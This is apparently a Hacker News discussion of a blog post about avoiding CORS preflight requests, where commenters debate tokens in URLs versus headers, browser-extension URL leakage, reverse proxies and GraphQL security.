> In terms of security, all API calls should be using https and there is little difference in putting the token in headers or as part of the query string.
Mostly true. But as a heads up, you might want to shy away from this as plenty of browser extensions are actually spyware and report full URLs back to the mothership. We ran into this recently where calls to our service including API keys in the query parameters ended up being reported back -- our customers were testing our API by calling it in the browser. Some kind of extension(s) was reporting it to a service that finds popular URLs on a given domain.
Headers aren't much more secure if someone is trying to steal data, but analytics providers/url aggregators don't care about some arbitrary header.
Our solution has been to push users to use headers and offer mutual auth (client certificates). At least with mutual auth, there isn't a trivially-leakable shared secret, but it does require more sophisticated automation (or a gateway/proxy) for clients to manage.
I wish browser vendors would put work into making the browser-managed client certificate UX much nicer. That would make it possible to offer a real step change in security.
FWIW, if it clarifies things, we disable shared secret auth when enabling mutual auth. At that point, you can really only call it with curl or your application.
I'm not sure I follow. If you can use it from curl (presumably by passing the client certificate) couldn't you also use it from a browser? The browser has client certificate infrastructure, surely it can use it when making ajax requests?
You can, it just requires you to import the cert and use some pretty gnarly UI. I didn't mean to imply you couldn't use it from the browser, just that it was much less likely than curl + we rely on the cert for figuring out your account and not an API key.
Right, which ties back into my original point. I bet there are devs using the less secure interface right now because it was easier to test in the browser that way. Good UX for certificate management in browsers would make a lot of the web more secure.
If your token is invalidated and regenerated after every request, this mitigates a token leaking (unless the browser extension intercepts your call and uses the token immediately... at which point your user has other problems to worry about!)
https://github.com/lynndylanhurley/devise_token_auth#about-t... has a good example of this. It's nontrivial for either clients or server to implement (the edge cases around overlapping requests require careful thought), but it would likely solve this scenario.
> we had to deal with making CORS requests from app.example.com to api.example.com
What? If you share the same domain but a different sub domain then just set the document.domain property[1] so they trust each other and be done with it. You don't even need CORS...
Alternatively setup a proxy to keep everything behind the same domain. This is typically a best practice.
> In our case, since each CORs request makes a preflight check, it doubles this significant latency without adding any value.
Considering CORS contains no body and does no processing beyond asking what the client can and cannot do, it seems odd this would always "double" the latency here.
> After reading a great blog post and MDN’s CORS docs I realized there are circumstances where the browser does not make a preflight request, if conditions are met
Okay this is scaring me. Where are we going with this?
> In terms of security, all API calls should be using https and there is little difference in putting the token in headers or as part of the query string.
Yeah was afraid of that. Please don't do this especially if you use that URL in any way to give the user access to a link (e.g. downloading a file) because now it's part of their browser history and they can't completely log out.
> Thanks for reading this! I hope it helped, even if the conclusion is “preflight requests are too troublesome, I’m going proxy” :)
A proxy is the correct solution. Not this horrible hack fest of completely disregarding important HTTP headers. Sigh
Even more so, please prevent expensive TLS setup roundtrips to two different hosts. That's probably 2x as expensive as a single preflight request for non-resuming sessions.
As parent states: a simple reverse proxy is probably the way to go here. Takes about 3 lines in nginx.
> After reading a great blog post and MDN’s CORS docs I realized there are circumstances where the browser does not make a preflight request, if conditions are met
I must say I was a bit surprised that some POST requests can be executed without verifying CORS. There must be a bunch of POST endpoints out there that do have side-effects based on the cookie value, even without body. The distinction in behaviour between json or form encoding is pretty bizarre imo.
I'd still recommend setting up a proxy that serves the api as app.your.co/api/. Dealing with CORS is just very troublesome and a complete waste of time.
This 1000x. While for some specific use cases it's important, trying to leverage CORS to for multiple backend systems that are under your control is not worth the hassle.
Everyone here is focusing on their strange app choices (which is fine) but the meat of the article is useful:
* Avoid content-type for GET requests
* if you're using HTTPS exclusively then custom headers for session auth is not generally needed so you can avoid those headers in GETs and POSTs as well.
* if you can get away with POSTing form-style vars rather than JSON then you'll avoid CORS issues too.
The rest of the article is honestly a bit pointless showboating of their app for no reason (and shows some rather poor practice not to mention the author being surprised by how CORS works in 2016...) but those are the takeaways.
2016 would be the rise of GraphQL or Falcor backends, where you write exactly what you are looking for on the frontend and send that request to the backend instead of REST endpoints.
This is a pretty neat idea. It seems like it would be a lot harder to reason about than REST endpoints.
I'm particularly thinking about validation (beyond the type-level, like when other data could conflict with a change) and security issues. What kinds of techniques are used to approach these concerns?
Both examples seem to be completely JavaScript-centric on the server side, but it seems like there's no reason it shouldn't work with different backend languages.
GraphQL servers exist in multiple languages, many of them have more mature implementations than the reference (JavaScript)server. Sangria (the Scala implementation) is particularly impressive. And one of the Elixir implementations, Absinthe, is coming along very nicely.
The main security concerns are:
* Data leakage, the GraphQL schema reveals the overall capabilities of your system, which may not be desirable. It may still be necessary to split into private/public implementations.
* Denial-of-service. Unless you take steps to mitigate it (there are a few approaches out there), it's often trivial to construct a query that could bring down a server. The two main approaches i've seen are white-listing queries at build time (so clients can't construct arbitrary queries), and adding cost/complexity heuristics to the server and rejecting any query over a certain threshold.
* Authentication. Not actually a new concern, because the issue is basically the same as with REST. But you do need to get authentication and permissioning properly designed on the backend, it's not something you can really defer until a later date.
Another symptom of how rotten the javascript ecosystem is. If I'm picking a technology stack for a business, I want to pick one that will last me 10 years.
> If I'm picking a technology stack for a business, I want to pick one that will last me 10 years.
What? Why wouldn't JavaScript last you 10 years? It's been around for over 20 already and is certainly not going anywhere...
You don't have to upgrade to the newest fad every 6 months like you seem to imply. Most modern languages have crazy fads (just maybe not as fast as JavaScript does) and no one jumps on them every single time they're released, why would JavaScript be different?
When I started going down the whole CORS rabbit hole a very simple solution came to me almost immediately via googling. Xdomain. It is simple, it doesn't do preflight checks, it's secure. The only silly edgecases are where other people have already worked around CORS awfulness for their client libraries (MixPanel, FB SDK, Intercom).
> 1. Find a way to proxy requests so that there’s no CORS
Turns out this is really, really easy.
I tried this recently on a cookie-authenticated web api (after discovering that CORS cookies are useless because mobile Safari will always block them).
I'm never touching CORS again unless it's a blasting out a bunch of '*' Access-Control-Whatevers on a public API.
I personally always thought that the CORS domain checking was needlessly and overly restrictive.
I can understand entirely different top-level domains; definitely 100% necessary.
You start to lose me at different sub-domains for the same top-level domain. Do we really need to check api.example.com from app.example.com? Chances are good that they're both controlled by the same entity, so what's the problem?
I'm out the door and around the corner when it gets down to the port number of the host. So now two requests that should resolve to the same machine need a CORS check? I think MS did right in having IE ignore the port in CORS domain checks. Not sure whether Edge does.
> Do we really need to check api.example.com from app.example.com?
Sure. What about hosted subdomains where people can create their own sites, with JS, on different subdomains? CORS can't work without applying the most restrictive policy by default -- if you do care about these things being able to access each other, send Access-Control headers.
So rely on proactive work by various SaaS vendors/other domain owners to preserve security for some of their clients, rather than relying on well-defined action from the owners of a particular service to ensure that said service works at all? Seems like we're "failing open" with the policy you suggest?
That's not yet used by all browsers. And it's a bit more restrictive than necessary, since the base domain is supposed to not be a website at all (and loses the ability to do some things with cookies iirc). That's not always the case. co.uk doesn't need to set cookies, but blogspot.com does (and is a website), so .blogspot.com can't be an eTLD.
super minor but unless I'm mistaken SPA stands for "Single Page Application", so the first sentence in the post is a bit jarring:
> AlphaSights’ recruitment platform evolved from a Rails application into a _classic SPA app_.
Update 20s later: is "Wepack" in the diagram supposed to be "Webpack"?
Update 60s later: Can you explain _what_ you're actually using that runs into CORS issues? Are browsers talking to the api.* address directly? The diagram seems to imply that all api.* communication is routed through app.*, in which case CORS wouldn't be an issue, right?
> Wow, my first thought was “headers are messy and this is so restrictive”. As a lazy developer, I’ve shied away from dealing with headers, relying on abstractions provided by libraries and frameworks.
I'm sure this is a common thought, but oh man it hurts me to read it.
The whole thing hurts to read. it could only hurt more if he'd discover the fact that there are in fact other verbs than GET and POST at the same time.
The diagram is bad, the browser is running code loaded on app.* and making requests to api.*; I've used similar setups and have run into the same issues the author is describing.
I was running into a CORS-related issue, and was thinking of a possible solution:
If it were possible to make "cookie-less" AJAX requests to things like APIs, would it be safe for those requests to bypass CORS? My impression is that the cookie sending is the main danger, and if we could opt-out, then the "use API with provided key" use-case could work independent of what the destination site wants.
I don't know if there's a "spec" for CORS rules though..
FYI, Safari on iOS will never send cookies cross-domain, regardless of how you configure the server or call your XmlHttpRequest (the user can enable 3rd-party cookies in Settings, but literally nobody will ever do this):
Sounds like they're hosted entirely on Heroku and didn't want to go through the effort of adding external infrastructure. But I just found out apparently you can host Nginx on Heroku [1] which is neat, but looks a bit sketchy
I think it's super important to understand that removing the preflight request practically kills the security measures of CORS. With no preflight request, the browser has no idea whether it can make a request until it already has, at which point it can only restrict access to the contents of the response.
The reason 'simple' and 'unsimple' exists is that simple requests are just normal XHR requests, and it would be infeasible to change all the web standards to prevent something that has been used for years.
Tokens in URLs is a very different, and perhaps drastically more insecure pattern than in headers. The primary issue is that it is extremely common to do:
Assuming you have an open redirect flaw in your login system (extremely common), I can now exfiltrate user authorization tokens to my own server.
Setting Content-Type to text/plain works, but doing this kind of fiddling is pretty scary. If your Content-Type ends up as XML or HTML, you've just opened up your site for global XSS.
> The browser does not make an OPTIONS request, the server with awareness can potentially not allow the request. Web frameworks don’t do this because in lieu of better security measures, such as CSRF or using sessionless authentication.
If I'm understanding it right, you're saying that if configured correctly, the server can decide to not display information if the CORS rules are not met. This is to my knowledge a misunderstanding of how CORS works. Once you realise that CORS is meant to be a static set of headers cache-able and dedicated to a specific endpoint it makes a lot more sense.
With CORS, it is the browser, having been informed by the CORS headers what restrictions are placed on making requests to that endpoint which decides whether a request can go through.
This misunderstanding can become ugly when, as I've seen in several popular libraries from my research -- when combined with the 'fail early' pattern. The CORS-aware middleware sends rules to the browser as it validates them, and if one fails exits prematurely. If an earlier CORS rule is purposely failed by an attacker during a preflight request, the middleware will not send all the CORS headers, allowing subsequent requests with less / zero restrictions.
Mostly true. But as a heads up, you might want to shy away from this as plenty of browser extensions are actually spyware and report full URLs back to the mothership. We ran into this recently where calls to our service including API keys in the query parameters ended up being reported back -- our customers were testing our API by calling it in the browser. Some kind of extension(s) was reporting it to a service that finds popular URLs on a given domain.
Headers aren't much more secure if someone is trying to steal data, but analytics providers/url aggregators don't care about some arbitrary header.
Our solution has been to push users to use headers and offer mutual auth (client certificates). At least with mutual auth, there isn't a trivially-leakable shared secret, but it does require more sophisticated automation (or a gateway/proxy) for clients to manage.